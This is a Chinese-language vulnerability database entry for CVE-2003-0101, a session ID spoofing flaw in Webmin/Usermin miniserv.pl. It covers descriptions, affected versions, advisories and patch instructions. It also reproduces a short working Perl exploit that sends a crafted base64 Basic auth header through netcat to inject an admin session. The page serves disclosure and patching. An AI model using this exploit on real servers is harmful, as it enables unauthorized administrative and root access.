CVE-2003-0101
CVSS10.0
发布时间 :2003-03-03 00:00:00
修订时间 :2016-10-17 22:29:30
NMCOES    

[原文]miniserv.pl in (1) Webmin before 1.070 and (2) Usermin before 1.000 does not properly handle metacharacters such as line feeds and carriage returns (CRLF) in Base-64 encoded strings during Basic authentication, which allows remote attackers to spoof a session ID and gain root privileges.


[CNNVD]Webmin/Usermin miniserv.pl远程未授权访问漏洞(CNNVD-200303-005)

        (1)Webmin 1.070之前的版本和(2)Usermin 1.000之前的版本中的miniserv.pl中存在漏洞,该漏洞源于没有正确处理元字符如换行符和Basic身份验证期间基于64编码字符串中的回车符。远程攻击者利用该漏洞欺骗会话ID,获得根权限。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:usermin:usermin:0.5
cpe:/a:usermin:usermin:0.4
cpe:/a:usermin:usermin:0.9
cpe:/a:usermin:usermin:0.8
cpe:/a:usermin:usermin:0.7
cpe:/a:usermin:usermin:0.6
cpe:/a:usermin:usermin:0.94
cpe:/a:usermin:usermin:0.93
cpe:/a:usermin:usermin:0.96
cpe:/a:usermin:usermin:0.95
cpe:/a:usermin:usermin:0.92
cpe:/a:engardelinux:guardian_digital_webtool:1.2Engarde Guardian Digital WebTool 1.2
cpe:/a:usermin:usermin:0.91
cpe:/a:usermin:usermin:0.98
cpe:/a:usermin:usermin:0.97
cpe:/a:webmin:webmin:1.0.50
cpe:/a:webmin:webmin:1.0.60
cpe:/a:usermin:usermin:0.99

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0101
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0101
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-005
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20030602-01-I
(UNKNOWN)  SGI  20030602-01-I
http://archives.neohapsis.com/archives/hp/2003-q1/0063.html
(UNKNOWN)  HP  HPSBUX0303-250
http://archives.neohapsis.com/archives/linux/engarde/2003-q1/0008.html
(UNKNOWN)  ENGARDE  ESA-20030225-006
http://marc.info/?l=bugtraq&m=104610245624895&w=2
(UNKNOWN)  BUGTRAQ  20030224 Webmin 1.050 - 1.060 remote exploit
http://marc.info/?l=bugtraq&m=104610300325629&w=2
(UNKNOWN)  BUGTRAQ  20030224 [SNS Advisory No.62] Webmin/Usermin Session ID Spoofing Vulnerability "Episode 2"
http://marc.info/?l=bugtraq&m=104610336226274&w=2
(UNKNOWN)  BUGTRAQ  20030224 GLSA: usermin (200302-14)
http://marc.info/?l=webmin-announce&m=104587858408101&w=2
(UNKNOWN)  CONFIRM  http://marc.info/?l=webmin-announce&m=104587858408101&w=2
http://www.ciac.org/ciac/bulletins/n-058.shtml
(UNKNOWN)  CIAC  N-058
http://www.debian.org/security/2003/dsa-319
(UNKNOWN)  DEBIAN  DSA-319
http://www.iss.net/security_center/static/11390.php
(VENDOR_ADVISORY)  XF  webmin-usermin-root-access(11390)
http://www.lac.co.jp/security/english/snsadv_e/62_e.html
(UNKNOWN)  MISC  http://www.lac.co.jp/security/english/snsadv_e/62_e.html
http://www.linuxsecurity.com/advisories/gentoo_advisory-2886.html
(UNKNOWN)  CONFIRM  http://www.linuxsecurity.com/advisories/gentoo_advisory-2886.html
http://www.mandriva.com/security/advisories?name=MDKSA-2003:025
(UNKNOWN)  MANDRAKE  MDKSA-2003:025
http://www.securityfocus.com/bid/6915
(UNKNOWN)  BID  6915
http://www.securitytracker.com/id?1006160
(UNKNOWN)  SECTRACK  1006160

- 漏洞信息

Webmin/Usermin miniserv.pl远程未授权访问漏洞
危急 输入验证
2003-03-03 00:00:00 2012-11-30 00:00:00
远程  
        (1)Webmin 1.070之前的版本和(2)Usermin 1.000之前的版本中的miniserv.pl中存在漏洞,该漏洞源于没有正确处理元字符如换行符和Basic身份验证期间基于64编码字符串中的回车符。远程攻击者利用该漏洞欺骗会话ID,获得根权限。

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 用户如果不需要此工具,可执行如下命令删除:
        versions remove websetup
        厂商补丁:
        SGI
        ---
        SGI已经为此发布了一个安全公告(20030602-01-I)以及相应补丁:
        20030602-01-I:WebSetup / WebMin Security Vulnerability on IRIX
        链接:ftp://patches.sgi.com/support/free/security/advisories/20030602-01-I
        SGI建议用户升级到IRIX 6.5.20或者升级Websetup到V3.5版本。
        补丁情况:
         系统版本 是否受影响 补丁号 备注
         ---------- ----------- ------- -------------
         IRIX 3.x 未知 备注 1
         IRIX 4.x 未知 备注 1
         IRIX 5.x 未知 备注 1
         IRIX 6.0.x 未知 备注 1
         IRIX 6.1 未知 备注 1
         IRIX 6.2 未知 备注 1
         IRIX 6.3 未知 备注 1
         IRIX 6.4 未知 备注 1
         IRIX 6.5 是 备注 2 & 3
         IRIX 6.5.1 是 备注 2 & 3
         IRIX 6.5.2 是 备注 2 & 3
         IRIX 6.5.3 是 备注 2 & 3
         IRIX 6.5.4 是 备注 2 & 3
         IRIX 6.5.5 是 备注 2 & 3
         IRIX 6.5.6 是 备注 2 & 3
         IRIX 6.5.7 是 备注 2 & 3
         IRIX 6.5.8 是 备注 2 & 3
         IRIX 6.5.9 是 备注 2 & 3
         IRIX 6.5.10 是 备注 2 & 3
         IRIX 6.5.11 是 备注 2 & 3
         IRIX 6.5.12 是 备注 2 & 3
         IRIX 6.5.13 是 备注 2 & 3
         IRIX 6.5.14 是 备注 2 & 3
         IRIX 6.5.15 是 备注 2 & 3
         IRIX 6.5.16 是 备注 2 & 3
         IRIX 6.5.17 是 备注 2 & 3
         IRIX 6.5.18 是 备注 2 & 3
         IRIX 6.5.19 是 备注 2 & 3
         IRIX 6.5.20 否
        
        备注:
        
        1) 这个版本的IRIX系统已经不再被维护了,请升级到受支持的版本,参看
        
        http://support.sgi.com/irix/news/index.html#policy
来获得更多的信息。
        2) 如果你还未收到一张IRIX 6.5.x for IRIX 6.5的CD,请联系SGI的支持部门,或访问:
        http://support.sgi.com

        3) 升级到IRIX 6.5.20或者从IRIX 6.5.20应用CD中安装websetup v3.5,应用CD可从如下地址下载获得:
        ftp://patches.sgi.com/support/free/security/patches/6.5.20/

- 漏洞信息 (22275)

Webmin 0.9x,Usermin 0.9x/1.0 Session ID Spoofing Unauthenticated Access Vulnerability (EDBID:22275)
linux remote
2003-02-20 Verified
0 Carl Livitt
N/A [点击下载]
source: http://www.securityfocus.com/bid/6915/info

A vulnerability has been discovered in the 'Miniserv.pl' script used to invoke both Webmin and Usermin. Due to insufficient sanitization of client-supplied BASE64 encoded input, it is possible to inject a Session ID into the access control list.

Successful exploitation of this vulnerability may allow an attacker to bypass typical authentication procedures, thus gaining adminstrative access to a webmin/usermin interface. 


#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";

$nc="/usr/bin/netcat";

if($#ARGV == -1) {
	print "Syntax:\n\t$0 hostname\n";
	exit(1);
}

$hostname=$ARGV[0];

if ( ! -x $nc ) {
	print "netcat not found!\n";
	exit(2);
}

open(NC, "|$nc $hostname 10000 >& /dev/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);

print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";


		

- 漏洞信息

10803
Webmin/Usermin miniserv.pl Base-64 String Metacharacter Handling Session Spoofing
Remote / Network Access Authentication Management, Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

Webmin and Usermin both contain a flaw that may allow a malicious user to gain access. The issue is due to a lack of proper sanitization for input supplied to the miniserv.pl script. If an attacker has knowledge of a valid username, that person can spoof a session ID, which is then added to the access control list, giving the attacker full access to the system (and thus root privileges on the system running the vulnerable program).

- 时间线

2003-02-24 2003-02-19
2003-02-24 Unknow

- 解决方案

Upgrade to version 1.070 or higher for Webmin and 1.000 or higher for Usermin, as these versions are known to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Webmin/Usermin Session ID Spoofing Unauthenticated Access Vulnerability
Input Validation Error 6915
Yes No
2003-02-20 12:00:00 2009-07-11 08:06:00
The discovery of this vulnerability has been credited to Keigo Yamazaki and Cintia M. Imanishi.

- 受影响的程序版本

Webmin Webmin 1.0 60
Webmin Webmin 1.0 50
Webmin Webmin 0.990
Webmin Webmin 0.970
Webmin Usermin 0.99
+ Mandriva Linux Mandrake 9.0
Webmin Usermin 0.98
+ HP Apache-Based Web Server 2.0.43 .00
+ HP Apache-Based Web Server 1.3.27 .00
+ HP Webmin-Based Admin 1.0 .01
Webmin Usermin 0.97
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
Webmin Usermin 0.96
Webmin Usermin 0.95
Webmin Usermin 0.94
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
Webmin Usermin 0.93
Webmin Usermin 0.92
Webmin Usermin 0.91
Webmin Usermin 0.9
Webmin Usermin 0.8
Webmin Usermin 0.7
Webmin Usermin 0.6
Webmin Usermin 0.5
Webmin Usermin 0.4
SGI IRIX 6.5.19
SGI IRIX 6.5.18
SGI IRIX 6.5.17
SGI IRIX 6.5.16
SGI IRIX 6.5.15
SGI IRIX 6.5.14
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
SCO OpenLinux Workstation 3.1.1
SCO OpenLinux Server 3.1.1
HP Webmin-Based Admin 1.0 .01
- HP HP-UX 11.22
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
HP Apache-Based Web Server 2.0.43 .00
- HP HP-UX 11.22
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
HP Apache-Based Web Server 1.3.27 .00
- HP HP-UX 11.22
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
EnGarde Guardian Digital WebTool 1.2
Webmin Webmin 1.0 70
+ HP Apache-Based Web Server 1.3.27 .01
+ HP Apache-Based Web Server 1.3.27 .01
+ HP Webmin-Based Admin 1.0.1 .01
+ HP Webmin-Based Admin 1.0.1 .01
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
Webmin Usermin 1.0
SGI IRIX 6.5.20

- 不受影响的程序版本

Webmin Webmin 1.0 70
+ HP Apache-Based Web Server 1.3.27 .01
+ HP Apache-Based Web Server 1.3.27 .01
+ HP Webmin-Based Admin 1.0.1 .01
+ HP Webmin-Based Admin 1.0.1 .01
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
Webmin Usermin 1.0
SGI IRIX 6.5.20

- 漏洞讨论

A vulnerability has been discovered in the 'Miniserv.pl' script used to invoke both Webmin and Usermin. Due to insufficient sanitization of client-supplied BASE64 encoded input, it is possible to inject a Session ID into the access control list.

Successful exploitation of this vulnerability may allow an attacker to bypass typical authentication procedures, thus gaining adminstrative access to a webmin/usermin interface.

- 漏洞利用

The following exploit has been made available by Carl Livitt &lt;carl@learningshophull.co.uk&gt;.

- 解决方案

It is recommended that all Gentoo Linux users who are running
app-admin/webmin upgrade to webmin-1.070 as follows:

emerge sync
emerge -u webmin
emerge clean

Gentoo Linux have recommended users who are running app-admin/usermin upgrade to usermin-1.000 as follows:

emerge sync
emerge -u usermin
emerge clean

EnGarde Secure Linux has released an advisory and fixes for the Digitial Guardian Webtool. Users are advise to upgrade as soon as possible.

HP has made fixes for available. See referenced advisory HPSBUX0303-250 for additional details.

SGI IRIX 6.5.x releases include the websetup package, which includes vulnerable versions of Webmin. websetup versions prior to 3.5 are prone to this issue. An updated version of websetup is available with the IRIX 6.5.20 Applications CD. Users are advised to upgrade to IRIX 6.5.20 or download a patched version of websetup from SGI.

Debian has released a security advisory (DSA 319-1) containing fixes to address this issue. Further information on how to obtain and apply fixes can be found in the attached advisory.

SCO has released an advisory (CSSA-2003-035.0) for OpenLinux that includes updates to address this issue.

The vendor has released updates which address this issue:


Webmin Usermin 0.4

Webmin Usermin 0.5

Webmin Usermin 0.6

Webmin Usermin 0.7

Webmin Usermin 0.8

Webmin Usermin 0.9

Webmin Usermin 0.91

Webmin Usermin 0.92

Webmin Usermin 0.93

Webmin Usermin 0.94

Webmin Usermin 0.95

Webmin Usermin 0.96

Webmin Usermin 0.97

Webmin Webmin 0.970

Webmin Usermin 0.98

Webmin Usermin 0.99

Webmin Webmin 1.0 50

Webmin Webmin 1.0 60

EnGarde Guardian Digital WebTool 1.2

HP Apache-Based Web Server 1.3.27 .00

SCO OpenLinux Workstation 3.1.1

SCO OpenLinux Server 3.1.1

SGI IRIX 6.5

SGI IRIX 6.5.1

SGI IRIX 6.5.10

SGI IRIX 6.5.11

SGI IRIX 6.5.12

SGI IRIX 6.5.13

SGI IRIX 6.5.14

SGI IRIX 6.5.15

SGI IRIX 6.5.16

SGI IRIX 6.5.17

SGI IRIX 6.5.18

SGI IRIX 6.5.19

SGI IRIX 6.5.2

SGI IRIX 6.5.3

SGI IRIX 6.5.4

SGI IRIX 6.5.5

SGI IRIX 6.5.6

SGI IRIX 6.5.7

SGI IRIX 6.5.8

SGI IRIX 6.5.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站